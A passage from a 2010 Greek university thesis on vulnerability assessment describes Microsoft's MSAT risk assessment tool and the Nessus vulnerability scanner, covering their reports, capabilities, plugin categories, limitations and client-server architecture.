Η αναφορά αποτελείται από τα εξής 3 μέρη:

• Summary Report: Περιέχει ένα γράφημα το οποίο απεικονίζει τη σχέση των δύο

βασικών δεικτών του εργαλείου, BRP και DiDI, για κάθε μια από τις επιμέρους ενότητες

αξιολόγησης.

• Complete Report: Περιέχει την πλήρη αναφορά του εργαλείου. Αρχικά παρέχονται

πληροφορίες για τη μεθοδολογία αξιολόγησης που χρησιμοποιεί το εργαλείο. Στη

συνέχεια παρουσιάζονται τα αποτελέσματα της αξιολόγησης, με βάση τις απαντήσεις που

δόθηκαν, σε έναν πίνακα. Το μέτρο σύγκρισης είναι ο βαθμό ς υιο θέτησης των

αναγνωρισμένων καλύτερων πρακτικών από την επιχείρηση. Οι περιοχές που απαιτούν

πρόσθετα μέτρα ασφάλειας ταξινομούνται σε κατηγορίες υψηλής, μεσαίας και χαμηλής

προτεραιότητας. Ακολουθεί μια αναλυτική παρουσίαση των καλύτερων αναγνωρισμένων

πρακτικών, των ευρημάτων και των συστάσεων για κάθε υποενότητα στην οποία

απαιτούνται πρόσθετα μέτρα ασφάλειας καθώς και αναφορές για αναζήτηση περαιτέρω

πληροφοριών.

• Comparison Report: Τα αποτελέσματα της αξιολόγησης μπορούν να αποσταλούν

ανώνυμα στη Microsoft και να συγκριθούν με άλλες αξιολογήσεις που έχουν διενεργηθεί

από εταιρείες που δραστηριοποιούνται στον ίδιο χώρο με την υπό εξέταση εταιρεία.

Page 151: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

151 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

4.7.3 Περιορισμοί και παρενέργειες

Το MSAT είναι ένα γενικευμένο εργαλείο αξιολόγησης επικινδυνότητας. Αυτό έχει σαν

αποτέλεσμα οι ερωτήσεις που χρησιμοποιεί να είναι γενικές και συνεπώς να αδυνατεί να

καλύψει τις επιμέρους ιδιαίτερες απαιτήσεις ασφάλειας μιας επιχείρησης. Δεν μπορεί να

προσδιορίσει ποια είναι τα αγαθά του πληροφοριακού συστήματος και ποιοι οι

συγκεκριμένοι κίνδυνοι που τα απειλούν. Αν και αρκετές από τις ερωτήσεις σχετίζονται με

τις διαδικασίες που ακολουθούνται για την προστασία του πληροφοριακού συστήματος,

υπάρχει σοβαρή υστέρηση στη λεπτομέρεια και στην εξατομίκευσή τους. Οι δείκτες BRP

και DiDI, που χρησιμοποιούνται δεν καταφέρνουν να προσεγγίσουν τις μεμονωμένες

ανάγκες μιας επιχείρησης.

Οι υποδείξεις τις οποίες προτείνει στην αναφορά του βασίζονται στις καλύτερες

αναγνωρισμένες πρακτικές για κάθε περιοχή ανάλυσης και όχι στις συγκεκριμένες ευπάθειες

που εντοπίζονται στην αξιολογούμενη επιχείρηση. Επομένως, δεν μπορεί να διαπιστωθεί ότι

τα μέτρα προστασίας τα οποία προτείνονται είναι ανάλογα των κινδύνων που αντιμετωπίζει

η επιχείρηση και η υιοθέτησή τους δεν μπορεί να αιτιολογηθεί.

Λόγω τις σχεδίασης του για μικρές και μεσαίες επιχειρήσεις αξιολογεί του κινδύνους της

επιχείρησης περισσότερο σε εύρος παρά σε βάθος. Συνεπώς, δεν μπορεί να προσδιορίσει την

αποτελεσματικότητα και την επάρκεια τόσο των υφιστάμενων μέτρων προστασίας, όσο και

των προτεινόμενων. Επιπλέον, ορισμένες υποδείξεις είναι τόσο γενικές με αποτέλεσμα να

μην μπορούν να αντιστοιχηθούν με συγκεκριμένα μέτρα προστασίας.

Οι αναφορές σε περαιτέρω πηγές πληροφόρησης οι οποίες παρέχονται στην παραγόμενη

αναφορά, σχετίζονται με θέματα που αφορούν προϊόντα και τεχνολογίες της Microsoft.

H παραγωγή συγκριτικής αναφοράς απαιτεί την παροχή των δεδομένων της αξιολόγησης

στη Microsoft, τα οποία υποστηρίζεται ότι θα έχουν καταστεί ανώνυμα.

Από τα παραπάνω εξάγεται το συμπέρασμα ότι το MSAT θα πρέπει να χρησιμοποιείται από

μια επιχείρηση μόνο ως γενικός κατευθυντήριος οδηγός, ο οποίος έχει σκοπό να υποδείξει

σε ποιους τομείς απαιτείται να ληφθούν πρόσθετα μέτρα ασφάλειας, σύμφωνα πάντα με τις

αναγνωρισμένες καλύτερες πρακτικές.

Page 152: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

152 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

4.7.4 Αρχιτεκτονική και τρόπος λειτουργίας

Το MSAT είναι μια εφαρμογή .NET η οποία έχει δημιουργηθεί για τα ακόλουθα Microsoft

Windows περιβάλλοντα:

• Windows Vista

• Windows Server 2003

• Windows Server 2008

• Windows XP Professional

• Internet Explorer 6.0

Είναι απαραίτητη η εγκατάσταση των τελευταίων service packs στο λειτουργικό σύστημα

και το φυλλομετρητή. Για τη χρήση του δεν είναι απαραίτητη η σύνδεση στο Internet, παρά

μόνο αν πρόκειται να γίνει αποστολή των δεδομένων αξιολόγησης ή έλεγχος ενημερώσεων

του εργαλείου.

Κατά την έναρξη του εργαλείου ζητείται από το χρήστη η δημιουργία του Προφίλ της

επιχείρησης που αξιολογείται. Αυτό γίνεται μέσω της δυνατότητας Διαχείρισης Προφίλ

(Manage Profiles) η οποία εμφανίζεται κατά την έναρξη της εφαρμογή ή από το μενού

επιλογών την εφαρμογής. Ο χρήστης έχει τη δυνατότητα να επιλέξει, να δημιουργήσει, να

αντιγράψει, να διαγράψει ή να μετονομάσει ένα Προφίλ, όπως φαίνεται στην επόμενη

εικόνα.

Εικόνα 4.12: Δημιουργία προφίλ στο MSAT

Το MSAT αποτελείται από δυο αξιολογήσεις: την αξιολόγηση του Επιχειρησιακού Προφίλ

Επικινδυνότητας (Business Risk Profile - BRP) και την αξιολόγηση της Άμυνας σε Βάθος

(Defense-in-Depth - DiD). Η αξιολόγηση BRP προσδιορίζει την επικινδυνότητα της

επιχείρησης στο χώρο που δραστηριοποιείται ενώ η αξιολόγηση DiD εξετάζει το ποσοστό

των καλύτερων αναγνωρισμένων πρακτικών που εφαρμόζονται στην επιχείρηση. Η

αξιολόγηση BRP γίνεται μόνο μια φορά, εκτός αν γίνουν σημαντικές αλλαγές στην υποδομή

της επιχείρησης. Οι αξιολογήσεις DiD μπορούν να γίνουν πολλές φορές με σκοπό να

Page 153: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

153 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

εκτιμήσουν την πρόοδο της επιχείρησης σε θέματα ασφάλειας. Κάθε αξιολόγηση αποτιμάται

σε σχέση με την αξιολόγηση BRP, ώστε να παραχθεί μια ολοκληρωμένη εικόνα για το

περιβάλλον ασφάλειας της επιχείρησης.

Η χρήση του εργαλείο υ απαιτεί πρώτα τη δημιουργίας ενό ς Προφίλ της επιχείρησης, με

σκοπό να δημιουργηθεί η αξιολόγηση BRP. Οι βασικές ερωτήσεις σχετίζονται με το όνομα

και το μέγεθος της επιχείρησης όπως φαίνεται στην επόμενη εικόνα.

Εικόνα 4.13: Οθόνη για τη δημιουργία μορφότυπου του οργανισμού αξιολόγησης στο MSAT

Μόλις συμπληρωθεί η σελίδα των βασικών ερωτήσεων ζητείται η συμπλήρωση του

Επιχειρηματικού Προφίλ Επικινδυνότητας. Οι ερωτήσεις που πρέπει να απαντηθούν

αφορούν στην ασφάλεια Υποδομών, Εφαρμογών, Διαδικασιών, Ανθρώπινου Δυναμικού και

Περιβάλλοντος.

Με την ολοκλήρωση της αξιολόγησης BRP εκκινείτε η αξιολόγηση DiD η οποία καλύπτει

τους τομείς Υποδομών, Εφαρμογών, Διαδικασιών και Ανθρώπινου Δυναμικού. Οι

βαθμολογίες της αξιολόγησης δημιουργούν τον πίνακα Άμυνας σε βάθος (Defense-in-Depth

index).

Page 154: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

154 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

Εικόνα 4.14: Οθόνη έναρξης αξιολόγησης του MSAT

Μετά την ολοκλήρωση της αξιολόγησης DiD είναι δυνατή η εμφάνιση της αναφοράς του

εργαλείου.

Εικόνα 4.15: Αναφορά του MSAT

Page 155: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

155 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

4.8 Nessus

4.8.1 Ταυτότητα

Το Nessus είναι εργαλείο εντοπισμού ευπαθειών (vulnerability scanner) της εταιρείας

Tenable Network Security Inc., το οποίο μπορεί να εκτελέσει μια πλειάδα από

αυτοματοποιημένους ελέγχους ασφάλειας, μειώνοντας σημαντικά το χρόνο που απαιτείται

σε σχέση με χειροκίνητους (manual) ελέγχους εντοπισμού ευπαθειών. Το Nessus

χρησιμοποιεί αρχιτεκτονική client-server, είναι εύχρηστο και φιλικό στο χρήστη ενώ στην

τελευταία του έκδοση, 4.2. η επικοινωνία με το Nessus Server διεξάγεται μέσω web

διεπαφής. Το εργαλείο είναι διαθέσιμο στην ιστοσελίδα http://www.nessus.org/nessus/.

Το Nessus υποστηρίζεται από τα εξής λειτουργικά συστήματα και πλατφόρμες:

• Red Hat ES 4 (i386), and ES 5 (i386 and x86-64)

• Fedora Core 10 (i386 and x86-64) [Compatible with Fedora 9]

• Fedora Core 11 (i586 and x86-64)

• Fedora Core 12 (i586 and x86-64)

• Debian 5 (i386 and x86-64)

• FreeBSD 7 (i386 and x86-64)

• Ubuntu 8.04 (i386 and x86-64)

• Ubuntu 8.10 (i386 and x86-64)

• Ubuntu 9.10 (i386 and x86-64)

• Mac OS X 10.4 / 10.5 (i386, x86-64, ppc)

• Windows XP, Server 2003, Server 2008, Vista and Windows 7 (i386 and x86-64)

• SuSE 9.3 (i386)

• SuSE 10.0 (i386 and x86-64)

Παρέχει τη δυνατότητα για τη διενέργεια ενός μεγάλου αριθμού ελέγχων, δεδομένου ότι

στην τελευταία έκδοση περιέχονται περισσότερα από 35.000 plugins60

60 Ο αριθμός των plugins συνεχώς αυξάνεται με την προσθήκη νέων. Η παρούσα αναφορά ισχύει για τον τρέχοντα αριθμό τους στης 15/4/2010 .

. Για κάθε καινούρια

ευπάθεια που ανακαλύπτεται, η εταιρεία δημιουργεί και διανέμει τον αντίστοιχο έλεγχο ως

plugin. Στην τελευταία έκδοση του Nessus υπάρχουν δύο διανομές του εργαλείου. Η

HomeFeed, η ο πο ία διατίθεται δωρεάν και αφορά το υς ο ικιακούς χρήστες και η

ProfessionalFeed, η οποία εξυπηρετεί εμπορικούς σκοπούς και απευθύνεται σε

επαγγελματίες. Κάθε νέο plugin που δημιουργείται είναι άμεσα διαθέσιμο στην

Page 156: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

156 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

ProfessionalFeed, ενώ στην HomeFeed είναι διαθέσιμο μετά από μια εβδομάδα. Επιπλέον,

στην ProfessionalFeed διανομή οι χρήστες λαμβάνουν επιπλέον υποστήριξη μέσω του

Tenable Support Portal ή μέσω e-mail καθώς και κάποια έτοιμα πακέτα ελέγχων (πολιτικές)

για Unix και Windows. Αναλυτικά οι διαφορές μεταξύ αυτών των δύο διανομών

παρουσιάζονται στον επόμενο πίνακα

FEATURE ProfessionalFeed HomeFeed Usage √Commercial √Non-Commercial Plugin Updates √ (real time) √ (real time) Virtual Appliance √ - Configuration Auditing √ - Sensitive Data Auditing √ - SCADA plugins √ - Nessus Technical Support √ - Customer Portal √ -

Πίνακας 4-3: Διαφορές εμπορική και δωρεάν διανομής του Nessus Πηγή: http://www.nessus.org/plugins/index.php?view=feed

Με το Nessus μπορούν να διενεργηθούν έλεγχοι τόσο απομακρυσμένα για να διαπιστωθεί

κατά πόσο είναι δυνατή η προσβολή της ασφάλειας του δικτύου, ό σο και το πικά σε ένα

μηχάνημα για τον έλεγχο ευπαθειών, συμμόρφωσης με τις προδιαγραφές ασφάλειας ή

παραβίασης της πολιτικής ασφάλειας.

Οι αναφορές που παράγει είναι φιλικές προς το χρήστη, ενώ ταυτόχρονα παρέχει και οδηγίες

για την αντιμετώπιση των ευπαθειών που ανακαλύπτει. Επιπλέον, παρέχει links για

περεταίρω ενημέρωση του χρήστη.

4.8.2 Δυνατότητες

Το Nessus είναι ένα ισχυρό και κυρίαρχο εργαλείο στην κατηγορία του. Οι κύριες

δυνατότητές του και τα πλεονεκτήματά του μπορούν να συνοψιστούν στα ακόλουθα:

• Τύποι ελέγχων ασφάλειας που υποστηρίζει:

o Σάρωση θυρών με ή χωρίς αυθεντικοποίηση στο ελεγχόμενο σύστημα

o Ανίχνευση ευπαθειών δικτύου

o Έλεγχοι ενημερώσεων για τα Windows και τις περισσότερες πλατφόρμες Unix

o Έλεγχοι πιστοποιημένων χαρακτηριστικών διαμόρφωσης για τις περισσότερες

πλατφόρμες Windows και Unix

Page 157: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

157 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

o Έλεγχοι ασφάλειας για εφαρμογές τρίτων μερών όπως Adobe, JAVA, Skype και

Firefox

o Έτοιμοι και προσαρμοσμένοι έλεγχοι ευπαθειών web εφαρμογών

o Έλεγχοι διαμόρφωσης SQL βάσεων δεδομένων

o Απαρίθμηση λογισμικού σε Unix και Windows

o Έλεγχοι εγκατεστημένου λογισμικού anti-virus για λάθη διαμόρφωσης και έλλειψη

ενημερώσεων

o Σάρωση ad-hoc

• Ενημερωμένη βάση δεδομένων ευπαθειών: Για κάθε νέα ευπάθεια που ανακαλύπτεται

και ανακοινώνεται δημιουργείται και ο αντίστοιχος έλεγχος, μέσα σε 24 ώρες συνήθως.

Η βάση δεδομένων των ελέγχων ασφάλειας του Nessus server ενημερώνεται καθημερινά

και αυτόματα μέσω της ενεργοποίησης της εντολής update plugins που διαθέτει η

εφαρμογή.

• Έξυπνη σάρωση: Το Nessus, σε αντίθεση με άλλους ανιχνευτές ασφάλειας, δεν

υποθέτει τίποτα ως δεδομένο. Δηλαδή, δεν θα υποθέσει ότι μια δεδομένη υπηρεσία τρέχει

σε μια συγκεκριμένη θύρα. Αυτό σημαίνει, ότι εάν ένας web server τρέχει στη θύρα

1234, το Nessus θα τον ανιχνεύσει και θα ελέγξει την ασφάλειά του κατάλληλα. Θα

προσπαθήσει να επικυρώσει μια ευπάθεια μέσω της εκμετάλλευσης της, εάν αυτό είναι

δυνατό. Σε περιπτώσεις όπου μπορεί να προκαλέσει αρνητικές συνέπειες στο στόχο, το

Nessus χρησιμοποιεί τα banners για να καθορίσει την παρουσία της ευπάθειας. Σε αυτές

τις περιπτώσεις, θα αναφέρεται ποια μέθοδος χρησιμοποιήθηκε στην αναφορά που

παράγεται.

• Αρθρωτή Αρχιτεκτονική: Η αρχιτεκτονική client/server παρέχει την ευελιξία

επέκτασης του scanner (server) και τη σύνδεσή του με το γραφικό περιβάλλον του client

από οποιαδήποτε μηχανή που διαθέτει φυλλομετρητή ιστού, με αποτέλεσμα τη μείωση

των διοικητικών δαπανών (ένας εξυπηρετητής μπορεί να προσεγγιστεί από τους

πολλαπλούς κόμβους).

• Plugins: Κάθε έλεγχος ασφάλειας είναι γραμμένος σαν εξωτερικό plugin σε γλώσσα

NASL, ενώ παράλληλα ομαδοποιείται σε μια από τις σαράντα δύο (42) ομάδες plugins.

Με αυτό τον τρόπο είναι εύκολη η δημιουργία προσαρμοσμένων ελέγχων με την επιλογή

συγκεκριμένων plugins από μια ομάδα ή την επιλογή μιας συγκεκριμένης ομάδας, χωρίς

να είναι απαραίτητη η ανάγνωση του κώδικα της μηχανής Nessu s server. Επιπλέον, οι

ενημερώσεις του Nessus δεν περιλαμβάνουν κατά το κατέβασμα από το internet μη

αξιόπιστο κώδικα. Κάθε NASL plugin μπορεί να αναγνωστεί και να επεξεργαστεί για την

καλύτερη κατανόηση των αποτελεσμάτων των αναφορών του Nessus.

Page 158: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

158 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

• NASL: Το Nessus Scanner χρησιμοποιεί τη γλώσσα NASL, (Nessus Attack Scripting

Language), μια γλώσσα που έχει σχεδιαστεί ώστε να γράφονται οι έλεγχοι ασφάλειας

εύκολα και γρήγορα. Οι έλεγχοι ασφάλειας μπορούν επίσης να γραφούν και σε γλώσσα

C.

• Έξυπνη αναγνώριση υπηρεσιών: Το Nessus δεν κάνει την υπόθεση ότι οι κόμβοι

στόχοι ακολουθούν το πρότυπο ΙΑΝΑ στην εκχώρηση αριθμών θύρας. Αυτό σημαίνει ότι

θα αναγνωρίσει έναν FTP server που τρέχει σε μια μη συνήθη θύρα (π.χ. 31337) ή έναν

web server που τρέχει στη θύρα 8080.

• Πολλαπλές υπηρεσίες: Εάν ένας ή περισσότεροι web servers τρέχουν σε έναν κόμβο

(π.χ. ένας στη θύρα 80 και ένας άλλος στη θύρα 8080) το Nessus θα τους προσδιορίσει

και θα τους ελέγξει όλους.

• Ταυτόχρονος έλεγχος πολλαπλών κόμβους: Ανάλογα με τη διαμόρφωση του

συστήματος ανίχνευσης του Nessus είναι δυνατόν να ελεγχθεί ταυτόχρονα ένας μεγάλος

αριθμός από κόμβους.

• Πλήρη υποστήριξη SSL: Το Nessus έχει την ικανότητα να ελέγχει υπηρεσίες που

τρέχουν πάνω από SSL, όπως HTTPS, SMTPS, IMAPS, και άλλα.

• Συνεργαζόμενα plugins: Τα plugins που χρησιμοποιεί το Nessus για την εκτέλεση των

ελέγχων ασφάλειας συνεργάζονται μεταξύ τους ώστε να μην πραγματοποιούνται μη

απαραίτητοι έλεγχοι. Για παράδειγμα, αν ένας FTP server δεν επιτρέπει την ανώνυμη

είσοδο, ο σχετικός έλεγχος για ανώνυμη είσοδο δεν θα πραγματοποιηθεί.

• Ασφαλείς έλεγχοι: Ορισμένοι έλεγχοι μπορεί να είναι καταστρεπτικοί για συγκεκριμένες

υπηρεσίες δικτύου και να οδηγήσουν σε άρνηση υπηρεσίας (Denial of Service). Για να

μη συμβεί κάτι τέτοιο κατά την διάρκεια των ελέγχων, ειδικά σε παραγωγικά συστήματα,

το Nessus διαθέτει μια επιλογή «ασφαλών ελέγχων», η οποία επιτρέπει στο Nessus να

στηριχθεί σε banners και όχι στην εκμετάλλευση των πραγματικών ευπαθειών για να

καθορίσει εάν μια ευπάθεια είναι παρούσα.

• Έξυπνα plugins: Το Nessus μπορεί να καθορίσει ποια plugins πρέπει να χρησιμοποιήσει

και πο ια ό χι σε έναν απομακρυσμένο κόμβο. Για παράδειγμα, δεν θα ελέγξει για

ευπάθειες sendmail ενάντια σε Postfix. Αυτή η επιλογή ονομάζεται βελτιστοποίηση

(optimization).

• Πλήρης Αναφορά: Το Nessus δεν περιορίζεται μόνο στον εντοπισμό των ευπαθειών

ενός συστήματος και στον προσδιορισμό του επιπέδου επικινδυνότητάς τους, αλλά

παρέχει και λύσεις για τον περιορισμό τους.

• Ομάδες Συζητήσεων: Οι χρήστες έχουν τη δυνατότητα να επικοινωνούν μεταξύ τους

και να επιλύουν τις απορίες τους μέσω ανοιχτού forum στη διεύθυνση

https://discussions.nessus.org/ .

Page 159: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

159 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

• Περεταίρω ενημέρωση για τις ευπάθειες: Τα περισσότερα plugins παρέχουν συνδέσεις

(Links) σε βάσεις δεδομένων για συνήθεις ευπάθειες και κινδύνους (CVE - Common

Vulnerabilities and Exposures), έτσι ώστε οι διαχειριστές των συστημάτων να

αναζητήσουν περισσότερες πληροφορίες για δημοσιευμένες ευπάθειες. Επίσης συχνά

συμπεριλαμβάνονται και αναφορές που σχετίζονται με επισημάνσεις ασφάλειας σε

Bugtraq (BID), σε Open Source Vulnerability Databases (OSVDB) καθώς και σε

αναφορές ασφάλειας κατασκευαστών.

• Μεγάλος αριθμός ελέγχων: Το Nessus περιέχει ένα μεγάλο αριθμό από security tests ο

οποίος συνεχώς αυξάνεται. Οι έλεγχοι μπορούν να ταξινομηθούν στις παρακάτω

κατηγορίες, ενώ η κάθε κατηγορία περιέχει ένα μεγάλο αριθμό επιμέρους ελέγχων.

o AIX Local Security Checks

o Backdoors

o CentOS Local Security Checks

o CGI abuses

o CGI abuses : XSS

o CISCO

o Databases

o Debian Local Security Checks

o Default Unix Accounts

o Denial of Service

o DNS

o Fedora Local Security Checks

o Finger abuses

o Firewalls

o FreeBSD Local Security Checks

o FTP

o Gain a shell remotely

o General

o Gentoo Local Security Checks

o HP-UX Local Security Checks

o MacOS X Local Security Checks

o Mandriva Local Security Checks

o Misc.

o Netware

o Peer-To-Peer File Sharing

o Policy Compliance

Page 160: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

160 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

o Port scanners

o Red Hat Local Security Checks

o RPC

o SCADA

o Service detection

o Settings

o Slackware Local Security Checks

o SMTP problems

o SNMP

o Solaris Local Security Checks

o SuSE Local Security Checks

o Ubuntu Local Security Checks

o VMware ESX Local Security Checks

o Web Servers

o Windows

o Windows : Microsoft Bulletins

o Windows : User management

4.8.3 Περιορισμοί και παρενέργειες

Το Nessus γενικά είναι ένα πολύ χρήσιμο εργαλείο. Ωστόσο η χρήση του μπορεί να

προκαλέσει ορισμένες παρενέργειες στο σύστημα. Οι κυριότερες από αυτές είναι οι

ακόλουθες:

• Μερικά plugins μπορούν να οδηγήσουν σε άρνηση υπηρεσίας (Denial of Service).

• Η διενέργεια ορισμένων ελέγχων, όπως εξαντλητικής αναζήτησης, σε ένα δίκτυο ή έναν

κόμβο που δεν είναι κατάλληλα διαμορφωμένος μπορεί να οδηγήσει σε απώλεια των

πόρων

• Όταν οι έλεγχοι πραγματοποιούνται σε εικονικές μηχανές (VMWare), η ανίχνευση είναι

πολύ αργή σε σχέση με τους ελέγχους που πραγματοποιούνται σε ένα απομακρυσμένο

μηχάνημα.

• Η ενεργοποίηση της επιλογής safe checks μπορεί να οδηγήσει σε λανθασμένη ανίχνευση

ευπαθειών.

• Καταναλώνει μεγάλος εύρος ζώνης (bandwidth)

• Η λειτουργία του επηρεάζεται από την τοπολογία του δικτύου, καθώς και από τους

υπόλοιπους μηχανισμούς ασφάλειας που χρησιμοποιούνται στο σύστημα στόχο

(Αναχώματα Ασφάλειας, IDS κλπ)

Page 161: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

161 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

• Οι ευπάθειες που εντοπίζει είναι τεχνικές και όχι λειτουργικές ή λογικές

4.8.4 Αρχιτεκτονική και τρόπος λειτουργίας

Το Nessus χρησιμοποιεί την αρχιτεκτονική πελάτης - διακομιστής (client-server). Στο

Nessus client διαμορφώνονται οι κατάλληλες επιλογές, ρυθμίζονται οι παράμετροι των

ελέγχων τρωτότητας για τους πολυποίκιλους στόχους και δίνεται η αναφορά των

αποτελεσμάτων της έρευνας στον χρήστη. Ο Nessus server, είναι αυτός που πραγματοποιεί

όλους τους ελέγχους τρωτότητας οι οποίοι είναι εγκατεστημένοι ως plugins, γραμμένοι στην

γλώσσα Nessus Attack Scripting Language (NASL). Ο Nessus server περιμένει

εισερχόμενες αιτήσεις από τους Nessus clients που επιθυμούν να πραγματοποιήσουν

συγκεκριμένους ελέγχους. Οι clients πρέπει να αυθεντικοποιούνται από τον server, πριν τους

επιτραπεί να πραγματοποιήσουν ελέγχους τρωτότητας. Αυτή η αρχιτεκτονική διευκολύνει

την κεντρική διαχείριση των Nessus εγκαταστάσεων. Όλη η επικοινωνία μεταξύ πελάτη και

διακομιστή πραγματοποιείται μέσω μίας κρυπτογραφημένης σύνδεσης TLS (Transport

Layer Security).

Το Nessus μπορεί να τρέξει με δύο τρόπους: με ή χωρίς αυθεντικοποίηση στο μηχάνημα

στόχο Όταν τρέχει χωρίς αυθεντικοποίηση, το Nessus εκτελεί απομακρυσμένους Web-based

ελέγχους ασφάλειας, ελέγχοντας πώς ανταποκρίνεται ο στόχος (κόμβος) σε συγκεκριμένους

δικτυακούς ελέγχους. Από την άλλη, όταν τρέχει με αυθεντικοποίηση, επιπροσθέτως,

αποκτά πρόσβαση στον απομακρυσμένο κόμβο και πραγματοποιεί μια σειρά από τοπικούς

ελέγχους ασφαλείας, όπως η επιβεβαίωση ότι είναι ενημερωμένος ο κόμβος με τις

τελευταίες ενημερώσεις και επιδιορθώσεις λογισμικού. Το NESSUS τρέχει σε Windows,

Mac OS X καθώς και σε διάφορες εκδόσεις UNIX.

